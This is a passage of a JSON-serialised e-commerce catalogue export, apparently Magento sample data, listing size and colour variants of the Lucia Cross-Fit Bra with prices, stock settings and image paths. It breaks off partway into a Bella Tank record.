Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1614\":{\"sku\":\"WB05-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -M-Purple\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1615\":{\"sku\":\"WB05-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -L-Black\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1616\":{\"sku\":\"WB05-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -L-Orange\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1617\":{\"sku\":\"WB05-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -L-Purple\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1618\":{\"sku\":\"WB05-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -XL-Black\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1619\":{\"sku\":\"WB05-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -XL-Orange\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1620\":{\"sku\":\"WB05-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -XL-Purple\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1621\":{\"sku\":\"WB05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra \",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Bra,material=Microfiber|Nylon|Polyester,pattern=Checked,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WB05-XS-Black,size=XS,color=Black|sku=WB05-XS-Orange,size=XS,color=Orange|sku=WB05-XS-Purple,size=XS,color=Purple|sku=WB05-S-Black,size=S,color=Black|sku=WB05-S-Orange,size=S,color=Orange|sku=WB05-S-Purple,size=S,color=Purple|sku=WB05-M-Black,size=M,color=Black|sku=WB05-M-Orange,size=M,color=Orange|sku=WB05-M-Purple,size=M,color=Purple|sku=WB05-L-Black,size=L,color=Black|sku=WB05-L-Orange,size=L,color=Orange|sku=WB05-L-Purple,size=L,color=Purple|sku=WB05-XL-Black,size=XL,color=Black|sku=WB05-XL-Orange,size=XL,color=Orange|sku=WB05-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Bra\",\"material\":\"Microfiber|Nylon|Polyester\",\"pattern\":\"Checked\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1622\":{\"sku\":\"WT01-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Bella Tank-XS-Black\",\"description\":\"<p>Style, performance and comfort mix it up in the Bella Tank. With striking color block contrast, fitted form and a built-in bra, you\'ll be supported and stylish at the same time.<\\/p>\\n<p>&bull; Navy blue tank top - cotton.<br \\/>&bull; Feminine scoop neckline.<br \\/>&bull; Power mesh lining in shelf bra for superior 